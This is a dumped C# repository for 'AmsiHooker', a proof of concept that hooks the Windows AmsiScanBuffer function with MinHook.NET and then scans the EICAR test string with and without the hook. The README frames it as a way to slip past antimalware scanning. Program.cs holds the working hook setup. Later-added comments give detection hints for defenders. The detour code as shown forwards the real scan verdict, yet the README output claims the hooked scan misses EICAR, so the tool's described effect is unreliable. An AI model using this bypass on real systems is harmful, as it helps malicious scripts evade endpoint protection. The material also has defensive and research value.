├── packages
└── MinHook.NET.1.1.1
│ ├── MinHook.NET.1.1.1.nupkg
│ └── lib
│ ├── net40
│ └── MinHook.NET.dll
│ └── net45
│ └── MinHook.NET.dll
├── packages.config
├── App.config
├── SharpHookTest.sln
├── Properties
└── AssemblyInfo.cs
├── SharpHookTest.csproj
├── README.md
├── Program.cs
└── .gitignore
/packages/MinHook.NET.1.1.1/MinHook.NET.1.1.1.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jfmaes/AmsiHooker/HEAD/packages/MinHook.NET.1.1.1/MinHook.NET.1.1.1.nupkg
--------------------------------------------------------------------------------
/packages/MinHook.NET.1.1.1/lib/net40/MinHook.NET.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jfmaes/AmsiHooker/HEAD/packages/MinHook.NET.1.1.1/lib/net40/MinHook.NET.dll
--------------------------------------------------------------------------------
/packages/MinHook.NET.1.1.1/lib/net45/MinHook.NET.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jfmaes/AmsiHooker/HEAD/packages/MinHook.NET.1.1.1/lib/net45/MinHook.NET.dll
--------------------------------------------------------------------------------
/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SharpHookTest.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31402.337
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpHookTest", "SharpHookTest.csproj", "{9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {C552BBA7-27E8-4E2A-80E0-D63F25E65748}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpHookTest")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpHookTest")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9d2affd7-37a5-4b5a-aec1-e5928d006fe4")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SharpHookTest.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {9D2AFFD7-37A5-4B5A-AEC1-E5928D006FE4}
8 | Exe
9 | SharpHookTest
10 | SharpHookTest
11 | v4.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 | packages\MinHook.NET.1.1.1\lib\net45\MinHook.NET.dll
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AmsiHooker
2 | Hookers are cooler than patches.
3 |
4 |
5 | simple eicar test sample but you know what to do with it lmao.
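6 | it first hooks AmsiScanBuffer, pushes the eicar test string through amsi, then disables the hook and scans the same string again. note that the `0` in `result 0` of the sample output below was a literal from the message's format string, not the AMSI_RESULT value.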
7 |
8 | ```
9 | MWWWWMWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWMWWWWMWWWMMWWWWWWWWWNK0000KNWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWM
10 | WWWWWWWMWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWXkl;'......'cxXWWWWWWWWMWWWWWWWWMWWWMWWWWWWW
11 | MWWWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWKo. .':loddoc,. 'xNWWWWMWWWMWWWWMWWWMWWWWWWWWM
12 | WWWWWWWWWWWMWWWWMWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWWWO, .cOXWMWWWWWNk, cXMWWWWWWWWWWWWWMWWWMWWWWWWW
13 | MWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWWWWWMW0' .dNWWWWWWWWWWWK; .oNWWWWWWWWWWWWWWWMWWWWWWWWM
14 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNl lNWWWWWWWWWWWWWk. ,KWWWWWWWWWWWWWWWWWWWWWWWWW
15 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWM0, .OWWWWWWWWWWWWWWO. ,0WWWWWWWWWWWWWWWWWWWWWWWWW
16 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWk. ;KWWWWWWWWWWWWWNo lNWWWWWWWWWWWWWWWWWWWWWWWWW
17 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNd. cXWWWWWWWWWWWWWX: ,0WWWWWWWWWWWWWWWWWWWWWWWWWW
18 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNXl lNWWWWWWWWWWWWWWO,:XWWWMWWWWWWWWWWWWWWWWWWWWWW
19 | WWWWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWMWWWWWWXO: .dWWWWWWMWWWWWWWWW0xXMWWWWMWWWMWWWWWWWWMWWWWWWW
20 | MWWWWWWWWMWWWMMWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWOl' .OWWWWMWWWMWWWWMWWWWWWWWWWWWMWWWWMWWWMWWWMWWWWW
21 | WWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWMWWWWWWWWWWWWMXc. cXWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
22 | MWWWWWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWW0: ;0WWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWW
23 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXd. .,oXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
24 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNKkoc;cONo. ;ONWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
25 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKxl,. ;OOxkXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
26 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXx:. .,;:xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
27 | WWWWWWWWWWWWWWWWWWMWWWWWWWWWNx' ;KMWWWWWWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWW
28 | WWWWWWWWWWWMWWWWWWWWMWWWWNko0O; ;KWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
29 | MWWWWMWWWWWWWWWWWWMWWWMWWK; .d0d. lNMWWWWWWWWMWWWWWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWWWWWM
30 | WWWWWWWMWWWWWWWWMWWWMWWWWWx. :OOl. .xWWWWWWWWWWWWWWWWWWWWWMWWWMWWWWMWWWWWWWWMWWWWWWWWWWW
31 | MWWWWWWWWMWWWWWWWWMWWWMWWWWO; .cOOl' :XMWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWM
32 | WWWWWWWMWWWMWWWWMWWWMWWWWMWWXx, .:xOxc. 'OWWWWWWWWWWWWWMWWWWMWWWWWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
33 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXk:. 'cxOko:'.'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
34 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0o;. .;ldkOKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
35 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0dc,...'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
36 | WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNX0O0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
37 | WWMMWWMMWWWMMWWMMWWWMWWWMMWW----AMSI HOOKER by jfmaes---WWMMWWWMWWWMMWWWMWWWMMWWWMWWWMMWWMMWWWMWWWMM
38 |
39 | Failed to detect EICAR test, result 0
40 | Detected EICAR test
41 |
42 | ```
43 |
--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Text;
4 | using MinHook;
5 |
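namespace SharpHookTest
{
    /// <summary>
    /// Console proof of concept: creates a MinHook.NET hook on the
    /// <c>AmsiScanBuffer</c> export of the Amsi.dll loaded in this process,
    /// scans the EICAR test string through AMSI, disables the hook and scans
    /// the same string again.
    /// </summary>
    /// <remarks>
    /// Reviewer notes for defenders:
    /// the hook is requested for this process's own copy of Amsi.dll (see
    /// <see cref="AmsiNoMo"/>); nothing in this file touches another process.
    /// MinHook.NET's internals are not on this page, but inline-hook engines of
    /// this family typically rewrite the first bytes of the target export, so
    /// comparing the in-memory code of amsi.dll with its on-disk image, and
    /// flagging a process that loads both amsi.dll and MinHook.NET.dll, are the
    /// relevant detection angles.
    /// </remarks>
    class Program
    {
        /// <summary>Hook engine from the MinHook.NET package; it owns the hook created in <see cref="AmsiNoMo"/>.</summary>
        HookEngine engine = new HookEngine();

        /// <summary>
        /// Scan verdicts written by <c>AmsiScanBuffer</c>. The numeric values are
        /// the ones declared in this file.
        /// </summary>
        public enum AMSI_RESULT
        {
            AMSI_RESULT_CLEAN = 0,
            AMSI_RESULT_NOT_DETECTED = 1,
            AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384,
            AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479,
            AMSI_RESULT_DETECTED = 32768
        }

        // Native imports. LoadLibrary is bound with ANSI strings, as in the original.
        [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
        static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);

        // The AMSI API takes its string arguments as LPCWSTR. The default
        // DllImport marshaling is ANSI, which handed AMSI a narrow string where a
        // wide one is expected, so the two imports with string parameters now
        // state CharSet.Unicode explicitly.
        [DllImport("Amsi.dll", CharSet = CharSet.Unicode)]
        public static extern uint AmsiScanBuffer(IntPtr amsiContext, byte[] buffer, uint length, string contentName, IntPtr session, out AMSI_RESULT result);

        [DllImport("Amsi.dll", CharSet = CharSet.Unicode)]
        public static extern uint AmsiInitialize(string appName, out IntPtr amsiContext);

        [DllImport("Amsi.dll")]
        public static extern void AmsiUninitialize(IntPtr amsiContext);

        /// <summary>
        /// Managed signature used for both the detour and the delegate returned
        /// by the hook engine for the original function.
        /// </summary>
        // NOTE(review): marshaling attributes on this delegate are left exactly
        // as in the original; only the P/Invoke declarations above were changed.
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate uint AmsiScanBufferDelegate(IntPtr amsiContext, byte[] buffer, uint length, string contentName, IntPtr session, out AMSI_RESULT result);

        /// <summary>Delegate returned by <c>engine.CreateHook</c>; the detour calls the original function through it.</summary>
        AmsiScanBufferDelegate AmsiBuffer_orig;

        /// <summary>
        /// Replacement installed for <c>AmsiScanBuffer</c> while hooks are enabled.
        /// </summary>
        /// <remarks>
        /// Pre-sets <paramref name="result"/> to <c>AMSI_RESULT_CLEAN</c> and then
        /// forwards every argument, including the same <c>out</c> parameter, to
        /// <see cref="AmsiBuffer_orig"/>. The value the caller sees is therefore
        /// whatever the forwarded call writes, and the forwarded call's return
        /// value is returned unchanged.
        /// </remarks>
        uint Amsi_Detour(IntPtr amsiContext, byte[] buffer, uint length, string contentName, IntPtr session, out AMSI_RESULT result)
        {
            result = AMSI_RESULT.AMSI_RESULT_CLEAN;
            return AmsiBuffer_orig(amsiContext, buffer, length, contentName, session, out result);
        }

        /// <summary>
        /// Loads Amsi.dll into the process, creates the hook on its
        /// <c>AmsiScanBuffer</c> export with <see cref="Amsi_Detour"/> as the
        /// replacement, and enables hooks on the engine.
        /// </summary>
        void AmsiNoMo()
        {
            // The module handle is not used afterwards and, as in the original,
            // a failed load is not checked here.
            LoadLibrary("Amsi.dll");
            AmsiBuffer_orig = engine.CreateHook("Amsi.dll", "AmsiScanBuffer", new AmsiScanBufferDelegate(Amsi_Detour));
            engine.EnableHooks();
        }

        /// <summary>Disables the hooks held by the engine.</summary>
        void DisableHooks()
        {
            engine.DisableHooks();
        }

        /// <summary>
        /// Opens an AMSI context, submits the EICAR anti-malware test string to
        /// <c>AmsiScanBuffer</c>, closes the context and prints the outcome.
        /// </summary>
        void EicarTest()
        {
            var virus = Encoding.UTF8.GetBytes(
                "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
            );

            IntPtr context;
            var hrInit = AmsiInitialize("AmsiTest", out context);
            if (hrInit != 0)
            {
                Console.WriteLine($"AmsiInitialize failed, HRESULT {hrInit:X8}");
                return;
            }

            AMSI_RESULT result;
            var hrScan = AmsiScanBuffer(
                context, virus, (uint)virus.Length,
                "EICAR Test File", IntPtr.Zero, out result
            );

            // The context is released before reporting, whatever the scan returned.
            AmsiUninitialize(context);

            if (hrScan != 0)
            {
                Console.WriteLine($"AmsiScanBuffer failed, HRESULT {hrScan:X8}");
            }
            else if (result >= AMSI_RESULT.AMSI_RESULT_DETECTED)
            {
                // Any value at or above AMSI_RESULT_DETECTED is a malware verdict
                // (this is what the SDK's AmsiResultIsMalware macro tests), so an
                // equality check could misreport a detection as a miss.
                Console.WriteLine("Detected EICAR test");
            }
            else
            {
                // The original message was an interpolated string containing "{0}",
                // which always printed the literal 0 and never the verdict. Print
                // the real AMSI_RESULT so the output can be trusted.
                Console.WriteLine($"Failed to detect EICAR test, result {result}");
            }
        }

        /// <summary>Prints the ASCII-art banner.</summary>
        static void printBanner()
        {
            Console.WriteLine(@"
MWWWWMWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWMWWWWMWWWMMWWWWWWWWWNK0000KNWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWM
WWWWWWWMWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWXkl;'......'cxXWWWWWWWWMWWWWWWWWMWWWMWWWWWWW
MWWWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWKo. .':loddoc,. 'xNWWWWMWWWMWWWWMWWWMWWWWWWWWM
WWWWWWWWWWWMWWWWMWWWMWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWWWO, .cOXWMWWWWWNk, cXMWWWWWWWWWWWWWMWWWMWWWWWWW
MWWWWWWWWMWWWWWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWWWWWMW0' .dNWWWWWWWWWWWK; .oNWWWWWWWWWWWWWWWMWWWWWWWWM
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNl lNWWWWWWWWWWWWWk. ,KWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWM0, .OWWWWWWWWWWWWWWO. ,0WWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWk. ;KWWWWWWWWWWWWWNo lNWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNd. cXWWWWWWWWWWWWWX: ,0WWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNXl lNWWWWWWWWWWWWWWO,:XWWWMWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWWWWWWMWWWMWWWWWWXO: .dWWWWWWMWWWWWWWWW0xXMWWWWMWWWMWWWWWWWWMWWWWWWW
MWWWWWWWWMWWWMMWWWMWWWMWWWWMWWWMWWWWWWWWMWWWWMWWWOl' .OWWWWMWWWMWWWWMWWWWWWWWWWWWMWWWWMWWWMWWWMWWWWW
WWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWMWWWWWWWWWWWWMXc. cXWWMWWWMWWWWWWWWMWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
MWWWWWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWWWWWWWW0: ;0WWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXd. .,oXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNKkoc;cONo. ;ONWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWKxl,. ;OOxkXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXx:. .,;:xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWMWWWWWWWWWNx' ;KMWWWWWWWWWWWWWWWWWWWWWWWWWWMWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWMWWWWWWWWMWWWWNko0O; ;KWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
MWWWWMWWWWWWWWWWWWMWWWMWWK; .d0d. lNMWWWWWWWWMWWWWWWWWMWWWMWWWWWWWWMWWWWMWWWMWWWWWWWWM
WWWWWWWMWWWWWWWWMWWWMWWWWWx. :OOl. .xWWWWWWWWWWWWWWWWWWWWWMWWWMWWWWMWWWWWWWWMWWWWWWWWWWW
MWWWWWWWWMWWWWWWWWMWWWMWWWWO; .cOOl' :XMWWWWWWWWWMWWWMWWWWMWWWMWWWWWWWWWWWWWMWWWMWWWWWWWWM
WWWWWWWMWWWMWWWWMWWWMWWWWMWWXx, .:xOxc. 'OWWWWWWWWWWWWWMWWWWMWWWWWWWMWWWWMWWWMWWWWMWWWMWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWXk:. 'cxOko:'.'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0o;. .;ldkOKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWN0dc,...'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNX0O0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
WWMMWWMMWWWMMWWMMWWWMWWWMMWW----AMSI HOOKER by jfmaes---WWMMWWWMWWWMMWWWMWWWMMWWWMWWWMMWWMMWWWMWWWMM
");
        }

        /// <summary>
        /// Entry point: prints the banner, runs the EICAR scan with the hook
        /// enabled, runs it again with the hook disabled, then waits for a key.
        /// </summary>
        static void Main(string[] args)
        {
            printBanner();
            Program p = new Program();
            p.AmsiNoMo();
            p.EicarTest();
            p.DisableHooks();
            p.EicarTest();
            Console.ReadKey();
        }
    }
}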
138 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # StyleCop
65 | StyleCopReport.xml
66 |
67 | # Files built by Visual Studio
68 | *_i.c
69 | *_p.c
70 | *_h.h
71 | *.ilk
72 | *.meta
73 | *.obj
74 | *.iobj
75 | *.pch
76 | *.pdb
77 | *.ipdb
78 | *.pgc
79 | *.pgd
80 | *.rsp
81 | *.sbr
82 | *.tlb
83 | *.tli
84 | *.tlh
85 | *.tmp
86 | *.tmp_proj
87 | *_wpftmp.csproj
88 | *.log
89 | *.vspscc
90 | *.vssscc
91 | .builds
92 | *.pidb
93 | *.svclog
94 | *.scc
95 |
96 | # Chutzpah Test files
97 | _Chutzpah*
98 |
99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 |
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 |
116 | # Visual Studio Trace Files
117 | *.e2e
118 |
119 | # TFS 2012 Local Workspace
120 | $tf/
121 |
122 | # Guidance Automation Toolkit
123 | *.gpState
124 |
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 |
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 |
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 |
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 |
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 |
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 |
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 |
153 | # Web workbench (sass)
154 | .sass-cache/
155 |
156 | # Installshield output folder
157 | [Ee]xpress/
158 |
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 |
169 | # Click-Once directory
170 | publish/
171 |
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 |
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 |
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 |
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 |
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 |
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 |
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 |
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 |
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 |
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 |
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 |
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 |
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 |
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 |
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 |
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 |
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 |
278 | # Visual Studio 6 build log
279 | *.plg
280 |
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 |
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 |
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
